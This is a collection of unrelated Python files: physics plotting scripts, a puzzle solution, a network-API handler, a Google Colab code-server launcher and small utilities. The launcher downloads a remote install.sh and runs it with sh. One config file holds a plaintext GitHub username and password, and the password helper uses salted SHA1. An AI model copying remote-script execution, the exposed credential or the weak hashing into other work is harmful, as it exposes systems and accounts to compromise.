return False
"""
Use the templates to prepare the workspace
"""
def prepareWorkspace(tagger,taggerDef,inDir):
inF=ROOT.TFile.Open('%s/%s.root'%(inDir,tagger))
colors = [ROOT.kGray, ROOT.kAzure+7, ROOT.kGreen,
ROOT.kGreen+1, ROOT.kOrange+8, ROOT.kMagenta+2,
ROOT.kYellow-3, ROOT.kYellow-5, 0]
#
#MC EFFICIENCIES
#
effGrs={}
for flav in ['b','c','l']:
preTag=inF.Get('%s_%s_pass0' % (flav,tagger) )
if not flav in effGrs: effGrs[flav]=[]
for iop in xrange(1,len(taggerDef)-2):
postTag=inF.Get('%s_%s_pass%d' % (flav,tagger,iop) )
effGrs[flav].append( postTag.Clone() )
effGrs[flav][-1].Sumw2()
effGrs[flav][-1].SetTitle('%s>%3.2f' % (tagger,taggerDef[iop+2] ))
effGrs[flav][-1].SetMarkerStyle(20+iop)
effGrs[flav][-1].SetMarkerColor(colors[iop])
effGrs[flav][-1].SetLineColor(colors[iop])
effGrs[flav][-1].SetFillStyle(0)
effGrs[flav][-1].Divide(preTag)
#
#FLAVOUR COMPOSITION
#
flavcategs=inF.Get('flavcategs')
catFracHistos=[]
for xbin in xrange(1,flavcategs.GetNbinsX()+1):
xlabel = flavcategs.GetXaxis().GetBinLabel(xbin)
totalInCat = flavcategs.Integral(xbin,xbin,1,flavcategs.GetNbinsY())
for ybin in xrange(1,flavcategs.GetNbinsY()+1):
ylabel=flavcategs.GetYaxis().GetBinLabel(ybin)
#init histo if not yet available
if len(catFracHistos)<ybin:
catFracHistos.append( ROOT.TH1F('catfrac%d'%ybin,
'%s;%s;Fraction' %(ylabel,flavcategs.GetTitle()),
flavcategs.GetNbinsX(),flavcategs.GetXaxis().GetXmin(),flavcategs.GetXaxis().GetXmax()))
catFracHistos[-1].SetTitle(ylabel)
catFracHistos[-1].SetDirectory(0)
catFracHistos[-1].Sumw2()
catFracHistos[-1].SetLineColor(1)
catFracHistos[-1].SetFillColor(colors[ybin-1])
catFracHistos[-1].SetMarkerColor(colors[ybin-1])
catFracHistos[-1].SetFillStyle(1001)
for binCtr in xrange(1, catFracHistos[-1].GetNbinsX()+1):
catFracHistos[-1].GetXaxis().SetBinLabel(binCtr,flavcategs.GetXaxis().GetBinLabel(xbin))
catFracHistos[ybin-1].SetBinContent(xbin,flavcategs.GetBinContent(xbin,ybin)/totalInCat)
catFracHistos[ybin-1].SetBinError(xbin,flavcategs.GetBinError(xbin,ybin)/totalInCat)
#SHOW PLOTS
ceff=ROOT.TCanvas('ceff','ceff',500,500)
ceff.SetTopMargin(0)
ceff.SetBottomMargin(0)
ceff.SetLeftMargin(0)
ceff.SetRightMargin(0)
txt=ROOT.TLatex()
txt.SetNDC(True)
txt.SetTextFont(43)
txt.SetTextSize(16)
txt.SetTextAlign(12)
ceff.cd()
p1=ROOT.TPad('p1','p1',0.,0.,1.0,0.33)
p1.SetBottomMargin(0.15)
p1.SetTopMargin(0.01)
p1.SetLeftMargin(0.12)
p1.SetRightMargin(0.05)
p1.Draw()
p1.cd()
for i in xrange(0,len(effGrs['b'])):
drawOpt='E1X0' if i==0 else 'E1X0same'
effGrs['b'][i].Draw(drawOpt)
effGrs['b'][i].GetXaxis().SetTitleSize(0.9)
effGrs['b'][i].GetXaxis().SetLabelSize(0.08)
effGrs['b'][i].GetYaxis().SetRangeUser(0.12,0.96)
effGrs['b'][i].GetYaxis().SetTitleSize(0.09)
effGrs['b'][i].GetYaxis().SetLabelSize(0.08)
effGrs['b'][i].GetYaxis().SetTitle('Efficiency')
effGrs['b'][i].GetYaxis().SetTitleOffset(0.6)
txt.DrawLatex(0.85,0.93,'#bf{[b]}')
ceff.cd()
p2=ROOT.TPad('p2','p2',0.,0.33,1.0,0.66)
p2.SetBottomMargin(0.01)
p2.SetTopMargin(0.01)
p2.SetLeftMargin(0.12)
p2.SetRightMargin(0.05)
p2.Draw()
p2.cd()
for i in xrange(0,len(effGrs['c'])):
drawOpt='E1X0' if i==0 else 'E1X0same'
effGrs['c'][i].Draw(drawOpt)
effGrs['c'][i].GetYaxis().SetRangeUser(0.12,0.96)
effGrs['c'][i].GetYaxis().SetTitleSize(0.09)
effGrs['c'][i].GetYaxis().SetLabelSize(0.08)
effGrs['c'][i].GetYaxis().SetTitle('Efficiency')
effGrs['c'][i].GetYaxis().SetTitleOffset(0.6)
txt.DrawLatex(0.85,0.93,'#bf{[c]}')
ceff.cd()
p3=ROOT.TPad('p3','p3',0.,0.66,1.0,1.0)
p3.SetBottomMargin(0.01)
p3.SetTopMargin(0.02)
p3.SetLeftMargin(0.12)
p3.SetRightMargin(0.05)
p3.Draw()
p3.cd()
leg=ROOT.TLegend(0.2,0.75,0.8,0.9)
leg.SetBorderSize(0)
leg.SetFillStyle(0)
leg.SetTextFont(42)
leg.SetNColumns(4)
leg.SetTextSize(0.06)
for i in xrange(0,len(effGrs['l'])):
drawOpt='E1X0' if i==0 else 'E1X0same'
effGrs['l'][i].Draw(drawOpt)
effGrs['l'][i].GetYaxis().SetRangeUser(0.12,0.96)
effGrs['l'][i].GetYaxis().SetTitleSize(0.09)
effGrs['l'][i].GetYaxis().SetLabelSize(0.08)
effGrs['l'][i].GetYaxis().SetTitle('Efficiency')
effGrs['l'][i].GetYaxis().SetTitleOffset(0.6)
leg.AddEntry(effGrs['l'][i],effGrs['l'][i].GetTitle(),'p')
leg.Draw()
txt.DrawLatex(0.9,0.93,'#bf{[l]}')
txt.DrawLatex(0.2,0.93,'#bf{CMS} #it{Simulation}')
ceff.cd()
ceff.Modified()
ceff.Update()
raw_input()
c=ROOT.TCanvas('c','c',500,500)
c.SetTopMargin(0.02)
c.SetRightMargin(0.1)
c.SetLeftMargin(0.12)
c.SetBottomMargin(0.15)
leg=ROOT.TLegend(0.2,0.75,0.8,0.9)
leg.SetBorderSize(0)
leg.SetFillStyle(0)
leg.SetTextFont(42)
leg.SetNColumns(4)
leg.SetTextSize(0.04)
stack=ROOT.THStack()
for h in catFracHistos:
stack.Add(h,'h')
leg.AddEntry(h,h.GetTitle(),'f')
stack.Draw('hist')
stack.GetYaxis().SetTitle('Fraction')
stack.GetXaxis().SetTitle('%s category'%SLICEVAR)
stack.GetXaxis().SetTitleOffset(2)
stack.GetYaxis().SetRangeUser(0,1)
leg.Draw()
txt=ROOT.TLatex()
txt.SetNDC(True)
txt.SetTextFont(43)
txt.SetTextSize(16)
txt.SetTextAlign(12)
txt.DrawLatex(0.2,0.93,'#bf{CMS} #it{Simulation}')
raw_input()
"""
steer the script
"""
def main():
ROOT.gStyle.SetOptStat(0)
ROOT.gStyle.SetOptTitle(0)
#ROOT.gROOT.SetBatch(True)
#configuration
usage = 'usage: %prog [options]'
parser = optparse.OptionParser(usage)
parser.add_option('-t', '--taggers', dest='taggers' , help='json with list of taggers', default=None, type='string')
parser.add_option('-i', '--inDir', dest='inDir', help='input directory with files', default=None, type='string')
parser.add_option('-l', '--lumi', dest='lumi' , help='lumi to print out', default=41.6, type=float)
parser.add_option('-n', '--njobs', dest='njobs', help='# jobs to run in parallel', default=0, type='int')
parser.add_option('-o', '--outDir', dest='outDir', help='output directory', default='analysis', type='string')
parser.add_option( '--recycleTemplates', dest='recycleTemplates', help='do not regenerate templates', default=False, action='store_true')
(opt, args) = parser.parse_args()
#read list of samples
taggersFile = open(opt.taggers,'r')
taggersList=json.load(taggersFile,encoding='utf-8').items()
taggersFile.close()
#re-create templates
if not opt.recycleTemplates:
task_list=[]
os.system('mkdir -p %s/FtM'%(opt.outDir))
for tagger,taggerDef in taggersList:
task_list.append((tagger,taggerDef,opt.inDir,opt.outDir))
print '%s jobs to run in %d parallel threads' % (len(task_list), opt.njobs)
if opt.njobs == 0:
for tagger,taggerDef,inDir,outDir in task_list:
prepareTemplates(tagger=tagger,
taggerDef=taggerDef,
inDir=inDir,
outDir=outDir)
else:
from multiprocessing import Pool
pool = Pool(opt.njobs)
pool.map(runPrepareTemplatesPacked, task_list)
#prepare workspace
for tagger,taggerDef in taggersList:
prepareWorkspace(tagger=tagger,taggerDef=taggerDef,inDir=opt.outDir+'/FtM')
#all done here
exit(0)
"""
for execution from another script
"""
if __name__ == "__main__":
sys.exit(main())
|
993,461 | 62f6afaa756ce364ca6fb8edc02181602fa8e376 | # https://adventofcode.com/2018/day/4
import re
from datetime import date, time, timedelta
SLEEP = -1
AWAKE = -2
def read_input(fn):
line_re = re.compile(r'^\[(\d+)-(\d+)-(\d+)\s+(\d+):(\d+)\]\s+(.+)$')
action_re = re.compile(r'Guard #(\d+) begins shift')
with open(fn) as file:
for year, month, day, hour, minute, action in (line_re.match(line).groups() for line in file):
d = date(int(year), int(month), int(day))
t = time(int(hour), int(minute))
if action == 'falls asleep':
action = SLEEP
elif action == 'wakes up':
action = AWAKE
else:
action = int(action_re.match(action).group(1))
if t > time(12, 0):
d += timedelta(days=1)
t = time(0)
yield (d, t, action)
def sleep_calendar(input):
current = None
for date, time, action in sorted(input):
if action > 0:
if current is not None:
yield current
current = (date, action, [0 for _ in range(60)])
elif action == SLEEP:
sleep = time
elif action == AWAKE:
current[2][sleep.minute:time.minute] = [1 for _ in range(sleep.minute, time.minute)]
if current is not None:
yield current
guards = {}
for c in sleep_calendar(read_input('day4.txt')):
guards.setdefault(c[1], [0 for _ in range(60)])
for i in range(60):
guards[c[1]][i] += c[2][i]
winner_guard = max(guards, key=lambda g: sum(guards[g]))
winner_minute = max(enumerate(guards[winner_guard]), key=lambda m: m[1])[0]
print(winner_guard * winner_minute)
winner_minute = max(range(60), key=lambda i: max(guards[g][i] for g in guards))
winner_guard = max(guards, key=lambda g: guards[g][winner_minute])
print(winner_minute * winner_guard)
|
993,462 | 2b242afc1610e58df35a42891782fac58101dd48 | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from networkapi.admin_permission import AdminPermission
from networkapi.ambiente.models import AmbienteError
from networkapi.ambiente.models import IP_VERSION
from networkapi.auth import has_perm
from networkapi.equipamento.models import Equipamento
from networkapi.exception import InvalidValueError
from networkapi.grupo.models import GrupoError
from networkapi.infrastructure.script_utils import exec_script
from networkapi.infrastructure.script_utils import ScriptError
from networkapi.infrastructure.xml_utils import dumps_networkapi
from networkapi.infrastructure.xml_utils import loads
from networkapi.infrastructure.xml_utils import XMLError
from networkapi.ip.models import NetworkIPv4
from networkapi.ip.models import NetworkIPv4Error
from networkapi.ip.models import NetworkIPv4NotFoundError
from networkapi.ip.models import NetworkIPv6
from networkapi.ip.models import NetworkIPv6Error
from networkapi.ip.models import NetworkIPv6NotFoundError
from networkapi.rest import RestResource
from networkapi.settings import NETWORKIPV4_CREATE
from networkapi.settings import NETWORKIPV6_CREATE
from networkapi.settings import VLAN_CREATE
from networkapi.util import is_valid_int_greater_zero_param
from networkapi.vlan.models import VlanError
from networkapi.vlan.models import VlanNotFoundError
class VlanCreateResource(RestResource):
log = logging.getLogger('VlanCreateResource')
def handle_post(self, request, user, *args, **kwargs):
"""Treat POST requests to run script creation for vlan and networks
URL: vlan/v4/create/ or vlan/v6/create/
"""
try:
# Generic method for v4 and v6
network_version = kwargs.get('network_version')
# Commons Validations
# User permission
if not has_perm(user, AdminPermission.VLAN_MANAGEMENT, AdminPermission.WRITE_OPERATION):
self.log.error(
u'User does not have permission to perform the operation.')
return self.not_authorized()
# Business Validations
# Load XML data
xml_map, attrs_map = loads(request.raw_post_data)
# XML data format
networkapi_map = xml_map.get('networkapi')
if networkapi_map is None:
msg = u'There is no value to the networkapi tag of XML request.'
self.log.error(msg)
return self.response_error(3, msg)
vlan_map = networkapi_map.get('vlan')
if vlan_map is None:
msg = u'There is no value to the vlan tag of XML request.'
self.log.error(msg)
return self.response_error(3, msg)
# Get XML data
network_ip_id = vlan_map.get('id_network_ip')
# Valid network_ip ID
if not is_valid_int_greater_zero_param(network_ip_id):
self.log.error(
u'Parameter id_network_ip is invalid. Value: %s.', network_ip_id)
raise InvalidValueError(None, 'id_network_ip', network_ip_id)
# Network must exists in database
if IP_VERSION.IPv4[0] == network_version:
network_ip = NetworkIPv4().get_by_pk(network_ip_id)
else:
network_ip = NetworkIPv6().get_by_pk(network_ip_id)
# Vlan must be active if Network is
if network_ip.active:
return self.response_error(299)
# Check permission group equipments
equips_from_ipv4 = Equipamento.objects.filter(
ipequipamento__ip__networkipv4__vlan=network_ip.vlan.id, equipamentoambiente__is_router=1)
equips_from_ipv6 = Equipamento.objects.filter(
ipv6equipament__ip__networkipv6__vlan=network_ip.vlan.id, equipamentoambiente__is_router=1)
for equip in equips_from_ipv4:
# User permission
if not has_perm(user, AdminPermission.EQUIPMENT_MANAGEMENT, AdminPermission.WRITE_OPERATION, None, equip.id, AdminPermission.EQUIP_WRITE_OPERATION):
self.log.error(
u'User does not have permission to perform the operation.')
return self.not_authorized()
for equip in equips_from_ipv6:
# User permission
if not has_perm(user, AdminPermission.EQUIPMENT_MANAGEMENT, AdminPermission.WRITE_OPERATION, None, equip.id, AdminPermission.EQUIP_WRITE_OPERATION):
self.log.error(
u'User does not have permission to perform the operation.')
return self.not_authorized()
# Business Rules
success_map = dict()
# If Vlan is not active, need to be created before network
if not network_ip.vlan.ativada:
# Make command
vlan_command = VLAN_CREATE % (network_ip.vlan.id)
# Execute command
code, stdout, stderr = exec_script(vlan_command)
if code == 0:
# After execute script, change to activated
network_ip.vlan.activate(user)
vlan_success = dict()
vlan_success['codigo'] = '%04d' % code
vlan_success['descricao'] = {
'stdout': stdout, 'stderr': stderr}
success_map['vlan'] = vlan_success
else:
return self.response_error(2, stdout + stderr)
# Make command to create Network
if IP_VERSION.IPv4[0] == network_version:
command = NETWORKIPV4_CREATE % (network_ip.id)
else:
command = NETWORKIPV6_CREATE % (network_ip.id)
# Execute command
code, stdout, stderr = exec_script(command)
if code == 0:
# After execute script, change the Network to activated
network_ip.activate(user)
network_success = dict()
network_success['codigo'] = '%04d' % code
network_success['descricao'] = {
'stdout': stdout, 'stderr': stderr}
success_map['network'] = network_success
else:
return self.response_error(2, stdout + stderr)
map = dict()
map['sucesso'] = success_map
vlan_obj = network_ip.vlan
# Return XML
return self.response(dumps_networkapi(map))
except InvalidValueError, e:
return self.response_error(269, e.param, e.value)
except NetworkIPv4NotFoundError, e:
return self.response_error(281)
except NetworkIPv6NotFoundError, e:
return self.response_error(286)
except VlanNotFoundError, e:
return self.response_error(116)
except XMLError, e:
self.log.error(u'Error reading the XML request.')
return self.response_error(3, e)
except ScriptError, s:
return self.response_error(2, s)
except (GrupoError, VlanError, AmbienteError, NetworkIPv6Error, NetworkIPv4Error), e:
return self.response_error(1)
|
993,463 | ac7dc1541bff22447d029a3195f23a1322383412 | import requests
res = requests.get("http://www.baidu.com")
print(res.cookies)
for key, value in res.cookies.items():
print(key + "=" + value)
|
993,464 | 73de781bacf3b0c15b9bc498f966e25458b73739 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 17 21:47:48 2019
@author: jaredgridley
The purpose of this program is to make a framed box based on the input specifications.
"""
import math
character = input("Enter frame character ==> ")
print(character)
height = int(input("Height of box ==> "))
print(height)
width = int(input("Width of box ==> "))
print(width)
dimensions_text = str(width) + "x" + str(height)
#These three variables all have to do with contructing the vertical part of the box
top_border = "{0}\n".format(character * width)
bottom_border = character * width
emptyspace_length = (" " * (width - 2))
text_vertical = math.floor(height / 2)
heightlines_top = "{0}{1}{2}\n".format(character, emptyspace_length, character) * ((height - 2) - text_vertical)
heightlines_bottom = "{0}{1}{2}\n".format(character, emptyspace_length, character) * ((height - 2) - (math.ceil(height/2) - 1))
#Making the horizontal part of the text line of the box
length_left = math.floor((width / 2) - (len(dimensions_text) / 2))
left_filling = "{0}{1}".format(character, (" " * (length_left - 1)))
length_right = width - (length_left + len(dimensions_text))
right_filling = "{0}{1}".format((" " * (length_right - 1)), character)
text_horizontal = "{0}{1}{2}".format(left_filling, dimensions_text, right_filling)
#This is all just setting up the print statement
above_text = ("{0}".format(top_border)) + heightlines_top
text = "{0}\n".format(text_horizontal)
below_text = heightlines_bottom + bottom_border
print("\nBox:")
print(above_text + text + below_text) |
993,465 | 293323a5af0e84f98e3dfa76495cedf0a2485dc5 | HEADLESS = False
# Changeable Constants
SEARCH_TERM = 'PS4'
MIN_PRICE = 1700
MAX_PRICE = 3000
MAX_NB_RESULTS = 50
# Rather Constant Constants
DIRECTORY = 'results'
CURRENCY = '€'
BASE_URL = "https://www.amazon.nl/"
FILTERS = {
'min': MIN_PRICE,
'max': MAX_PRICE
} |
993,466 | e24616b10433b22a779f7f1913ccb6afd1edbd4f | """
Utils
"""
import logging
def getLoggingLevel(verbosity):
"""Verbosity level to logging level."""
logLevels = {0: logging.WARNING, 1: logging.INFO}
if verbosity > 1:
return logging.DEBUG
else:
return logLevels.get(verbosity, logging.ERROR)
|
993,467 | 65808f0747867f43f808777454222cc95d5e7511 | import datetime
import urllib
import random
from django.contrib import auth
from django.contrib.auth.signals import user_logged_in
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.db.models.manager import EmptyManager
from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import smart_str
from hashlib import sha1 as sha_constructor
from django.utils.translation import ugettext_lazy as _
from django.utils.crypto import constant_time_compare
def get_hexdigest(algorithm, salt, raw_password):
"""
Returns a string of the hexdigest of the given plaintext password and salt
using the given algorithm ('md5', 'sha1' or 'crypt').
"""
raw_password, salt = smart_str(raw_password), smart_str(salt)
if algorithm == 'sha1':
return sha_constructor(salt + raw_password).hexdigest()
raise ValueError("Got unknown password algorithm type in password.")
def check_password(raw_password, enc_password):
"""
Returns a boolean of whether the raw_password was correct. Handles
encryption formats behind the scenes.
"""
algo, salt, hsh = enc_password.split('$')
return constant_time_compare(hsh, get_hexdigest(algo, salt, raw_password))
def set_password(raw_password):
algo = 'sha1'
salt = get_hexdigest(algo, str(random.random()), str(random.random()))[:5]
hsh = get_hexdigest(algo, salt, raw_password)
enc_password = '%s$%s$%s' % (algo, salt, hsh)
return enc_password |
993,468 | 47c85a58692be95e356e455c7c2ea469ecc7d222 | # Copyright (C) 2002-2017 CERN for the benefit of the ATLAS collaboration
""" Derive from the offline class and override InDetFlags
"""
__author__ = "J. Masik"
__version__= "$Revision: 1.2 $"
__doc__ = "ConfiguredNewTrackingTrigCuts"
from AthenaCommon.Include import include
_sharedcuts = False
if _sharedcuts:
from InDetRecExample.ConfiguredNewTrackingCuts import ConfiguredNewTrackingCuts as InDetTrigTrackingCuts
else:
from InDetTrigRecExample.InDetTrigTrackingCuts import InDetTrigTrackingCuts
del _sharedcuts
class ConfiguredNewTrackingTrigCuts(InDetTrigTrackingCuts):
def __set_indetflags(self):
from InDetTrigRecExample.InDetTrigFlags import InDetTrigFlags
self.__indetflags = InDetTrigFlags
EFIDTrackingCuts = ConfiguredNewTrackingTrigCuts("Offline")
EFIDTrackingCutsCosmics = ConfiguredNewTrackingTrigCuts("Cosmics")
EFIDTrackingCutsBeamGas = ConfiguredNewTrackingTrigCuts("BeamGas")
EFIDTrackingCutsLowPt = ConfiguredNewTrackingTrigCuts("LowPt")
EFIDTrackingCutsTRT = ConfiguredNewTrackingTrigCuts("TRT")
EFIDTrackingCutsHeavyIon = ConfiguredNewTrackingTrigCuts("HeavyIon")
L2IDTrackingCuts = EFIDTrackingCuts
|
993,469 | f904aa1a24126e7cd5b1fbd931d7d1dda5762298 | #/**********************************************************************/
#/* CSC 280 Programming Project 2 Part 1 */
#/* */
#/* modifier: Dri Torres */
#/* */
#/* filename: Part_2_Assignment_2.py */
# /* modified from: CSC 280 HW #2 lab */
#/* date last modified: 09/29/2013 */
#/* */
#/* action: computes whether specified age is of the pegal limit to drive,*/
#/* vote, drink, rent a car, retire, and collect Social Security */
#/* input: the circles's radius, entered by the */
#/* */
#/* */
#/* output: Y for "yes" or N for "no" answering all questions age */
#/* */
#/**********************************************************************/
# Promt user for subject's age
x = int(raw_input("Enter the subject's age now: "))
#Conditional block
if x >= 15:
print "Is subject old enough to drive? \t Y"
else:
print "Is subject old enough to drive? \t N"
if x >= 18:
print "Is the subject old enough to vote? \t Y"
else:
print "Is the subject old enough to vote? \t N"
if x >= 21:
print "Is the subject old enough to drink? \t Y"
else:
print "Is the subject old enough to drink? \t N"
if x >= 25:
print "Is the subject old enough to rent a car? \t Y"
else:
print "Is the subject old enough to rent a car? \t N"
if x >= 50:
print "Is the subject old enough to retire? \t Y"
else:
print "Is the subject old enough to collect SS? \t N"
if x >= 65:
print "Is the subject old enough to collect SS? \t Y"
else:
print "Is the subject old enough to collect SS? \t N"
# Enter the subject's age now: 12
# Is subject old enough to drive? N
# Is the subject old enough to vote? N
# Is the subject old enough to drink? N
# Is the subject old enough to rent a car? N
# Is the subject old enough to collect SS? N
# Is the subject old enough to collect SS? N
# Enter the subject's age now: 15
# Is subject old enough to drive? Y
# Is the subject old enough to vote? N
# Is the subject old enough to drink? N
# Is the subject old enough to rent a car? N
# Is the subject old enough to collect SS? N
# Is the subject old enough to collect SS? N
# Enter the subject's age now: 51
# Is subject old enough to drive? Y
# Is the subject old enough to vote? Y
# Is the subject old enough to drink? Y
# Is the subject old enough to rent a car? Y
# Is the subject old enough to retire? Y
# Is the subject old enough to collect SS? N
# Is subject old enough to drive? Y
# Is the subject old enough to vote? Y
# Is the subject old enough to drink? Y
# Is the subject old enough to rent a car? Y
# Is the subject old enough to retire? Y
# Is the subject old enough to collect SS? Y
|
993,470 | 0ad5bb8dce5ec9f2e66b5a86eaf37bb525084521 | import os
import subprocess
from pyngrok import ngrok
try:
from google.colab import drive
colab_env = True
except ImportError:
colab_env = False
EXTENSIONS = ["ms-python.python", "ms-toolsai.jupyter"]
class ColabCode:
def __init__(self, workspace, port=10000, password=None, authtoken=None, mount_drive=False, user_data_dir=None, extensions_dir=None):
self.workspace = workspace
self.port = port
self.password = password
self.authtoken = authtoken
self.user_data_dir = user_data_dir
self.extensions_dir = extensions_dir
self._mount = mount_drive
self._install_code()
self._install_extensions()
self._start_server()
self._run_code()
def _install_code(self):
subprocess.run(
["wget", "https://code-server.dev/install.sh"], stdout=subprocess.PIPE
)
subprocess.run(["sh", "install.sh"], stdout=subprocess.PIPE)
def _install_extensions(self):
for ext in EXTENSIONS:
subprocess.run(["code-server", "--install-extension", f"{ext}"])
def _start_server(self):
if self.authtoken:
ngrok.set_auth_token(self.authtoken)
active_tunnels = ngrok.get_tunnels()
for tunnel in active_tunnels:
public_url = tunnel.public_url
ngrok.disconnect(public_url)
url = ngrok.connect(addr=self.port, options={"bind_tls": True})
print(f"Code Server can be accessed on: {url}")
def _run_code(self):
os.system(f"fuser -n tcp -k {self.port}")
if self._mount and colab_env:
drive.mount("/content/drive")
prefix, options = [], [f"--port {self.port}", "--disable-telemetry"]
if self.password:
prefix.append(f"PASSWORD={self.password}")
else:
options.append("--auth none")
if self.user_data_dir:
options.append(f"--user-data-dir {self.user_data_dir}")
if self.extensions_dir:
options.append(f"--extensions-dir {self.extensions_dir}")
prefix_str = " ".join(prefix)
options_str = " ".join(options)
code_cmd = f"{prefix_str} code-server {options_str} {self.workspace}"
print(code_cmd)
with subprocess.Popen(
[code_cmd],
shell=True,
stdout=subprocess.PIPE,
bufsize=1,
universal_newlines=True,
) as proc:
for line in proc.stdout:
print(line, end="")
|
993,471 | 0857288303119f87eb6ae98c34e9db0435151f58 | from uuid import UUID
from pvm.activities.activity import Activity
from pvm.transition import Transition
class Cycle(Activity):
"""自循环活动节点
"""
def __init__(self, name: str, id: UUID = None):
super(Cycle, self).__init__(name, id)
self._reserved_transition = Transition()
self._reserved_transition.source = self
self._reserved_transition.destination = self
self.add_incoming_transition(self._reserved_transition)
super(Cycle, self).add_outgoing_transition(self._reserved_transition)
self._reserved_predicate = None
def set_predicate(self, predicate):
"""设置自循环出口条件
"""
self._reserved_predicate = predicate
self._reserved_transition.add_predicate(predicate)
def add_outgoing_transition(self, transition):
transition.add_predicate(lambda t: not self._reserved_predicate(t))
super(Cycle, self).add_outgoing_transition(transition)
|
993,472 | e9e03c0f9e0d193e84555bfd7da9c1f1e8231687 | '''
Created on 11 Mar 2019
@author: olma
'''
import math
class Line():
'''
classdocs
'''
def __init__(self, coor1, coor2):
'''
Constructor
'''
self.coor1 = coor1
self.coor2 = coor2
def distance(self):
# distance = radical din (x2-x1) la patrat + (y2 -y1) la patrat
# x1, y1 = self.coor1
# x2, y2 = self.coor2
distance = math.sqrt((self.coor2[0]-self.coor1[0])**2 + (self.coor2[1] - self.coor1[1])**2)
print(distance)
return distance
def slope(self):
m = (self.coor2[1] - self.coor1[1]) / (self.coor2[0]-self.coor1[0])
print(m)
return m
|
993,473 | 798efccd8ecc2e728f637da3a475e89511f88b15 | ## This function rotates a list k amount of times without generating a new array.
## e.g [1,2,3,4,5], k = 2 --> [3,4,5,1,2]
def rotateList(nums, k):
# pop(0) deletes the first object in nums
while k > 0:
temp = nums.pop(0)
nums.append(temp)
k -= 1
return nums
if __name__ == "__main__":
nums = [1,2,3,4,5]
print(rotateList(nums, 2)) |
993,474 | e88690b92280679a4fd4e908a35504ab10189294 |
global_data = {
'host': 'api.github.com',
'user': 'amitdad36',
'password': 'amit036198823',
}
tc1 = {
'method': 'post',
'url': '/gists',
'body': template_api['create_gist']
}
|
993,475 | 121203b2cb9f75b37685143847b564c34e0af8b2 | def foo(x):
return x**2
print foo(8.0) |
993,476 | 96531ce3bc3611d0063b8c7ef53f5bde09052a1c | import os
import shap
import torch
import numpy as np
import simple_influence
from scipy.stats import pearsonr, spearmanr
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, normalize
from eli5.permutation_importance import get_score_importances
os.environ['PYTHONHASHSEED'] = str(1234567890)
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
def gen_data():
n_samples = np.random.randint(100, 5000)
# n_samples = 1000
print('Number of Samples in DS: ' + str(n_samples))
n_feats = np.random.choice([10, 20, 50, 100], 1).item()
n_feats = 20
n_clusters = np.random.randint(2, 14)
sep = 5 * np.random.random_sample()
hyper = np.random.choice([True, False], 1).item()
X, y = make_classification(n_samples, n_features=n_feats, n_informative=n_feats // 2,
n_redundant=0, n_repeated=0, n_classes=2, n_clusters_per_class=n_clusters,
weights=None, flip_y=0, class_sep=sep, hypercube=hyper, shift=0, scale=1, shuffle=False)
X, x_test, y, y_test = train_test_split(X, y, test_size=0.2)
return X, x_test, y, y_test
class shallow_model(torch.nn.Module):
def __init__(self, n_feats, n_nodes, n_classes):
super(shallow_model, self).__init__()
self.lin1 = torch.nn.Linear(n_feats, n_nodes)
self.lin_last = torch.nn.Linear(n_nodes, n_classes)
self.selu = torch.nn.SELU()
def forward(self, x):
x = self.selu(self.lin1(x))
x = self.lin_last(x)
return x
def score(self, x, y):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
logits = torch.nn.functional.softmax(self.forward(x), dim=1)
score = torch.sum(torch.argmax(logits, dim=1) == y)/len(x)
return score.cpu().numpy()
def train_net(dataset, nodes, n_epochs):
x_train, x_test, y_train, y_test = dataset
accs = list()
device = 'cuda:0'
scaler = StandardScaler()
x_train_loo_scaled = scaler.fit_transform(x_train)
x_test_loo_scaled = scaler.transform(x_test)
classifier_all_feats = shallow_model(x_train.shape[1], nodes, len(np.unique(y_train))).to(device)
criterion = torch.nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(classifier_all_feats.parameters(), lr=1e-3, weight_decay=0.001)
for _ in range(n_epochs):
optimizer.zero_grad()
logits = classifier_all_feats(torch.from_numpy(x_train_loo_scaled).float().to(device))
loss = criterion(logits, torch.from_numpy(y_train).long().to(device))
loss.backward()
optimizer.step()
train_acc = classifier_all_feats.score(x_train_loo_scaled, y_train)
test_acc = classifier_all_feats.score(x_test_loo_scaled, y_test)
for i in range(x_train.shape[1]):
scaler = StandardScaler()
x_train_loo = np.delete(x_train, i, axis=1)
x_test_loo = np.delete(x_test, i, axis=1)
x_train_loo_scaled = scaler.fit_transform(x_train_loo)
x_test_loo_scaled = scaler.transform(x_test_loo)
classifier = shallow_model(x_train_loo.shape[1], nodes, len(np.unique(y_train))).to(device)
criterion = torch.nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(classifier.parameters(), lr=1e-3, weight_decay=0.001)
for _ in range(n_epochs):
optimizer.zero_grad()
logits = classifier(torch.from_numpy(x_train_loo_scaled).float().to(device))
loss = criterion(logits, torch.from_numpy(y_train).long().to(device))
loss.backward()
optimizer.step()
accs.append(classifier.score(torch.from_numpy(x_test_loo_scaled).float().to(device), torch.from_numpy(y_test).long().to(device)))
# print('{}/{}'.format(i+1, x_train.shape[1]))
return np.hstack(accs), classifier_all_feats, (train_acc, test_acc), (x_train, x_test, y_train, y_test)
def influence_approx(dataset, classifier):
x_train, x_test, y_train, y_test = dataset
scaler = StandardScaler()
x_train_scaled = scaler.fit_transform(x_train)
x_test_scaled = scaler.transform(x_test)
eqn_5 = simple_influence.i_pert_loss(x_train_scaled, y_train, x_test_scaled, y_test, classifier)
return eqn_5
def gradient_shap(dataset, classifier):
device = 'cuda:0'
classifier.to(device)
